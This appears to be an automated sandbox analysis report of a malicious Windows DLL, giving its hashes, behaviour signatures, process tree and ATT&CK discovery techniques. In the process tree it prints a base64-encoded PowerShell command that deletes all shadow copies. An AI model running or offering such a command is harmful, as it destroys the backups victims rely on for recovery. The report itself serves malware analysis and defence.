Analysis

  • max time kernel
    22s
  • max time network
    25s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    01-02-2022 12:54

General

  • Target

    578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll

  • Size

    164KB

  • MD5

    722e15d85827d3ac13e56e8108688012

  • SHA1

    cab935a24d7d0ea7e8d93851f7ea94ab9bccfc34

  • SHA256

    578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1

  • SHA512

    59e24cf313db4413f44f16a8276d072f43402e718c25e1d00e81ddc69a1937473cfd1902c320bc9175d75a0d43a53ab3e971b8447ec1cf9cf9aa3aa536464273

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4884
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4200
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
          PID:544

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads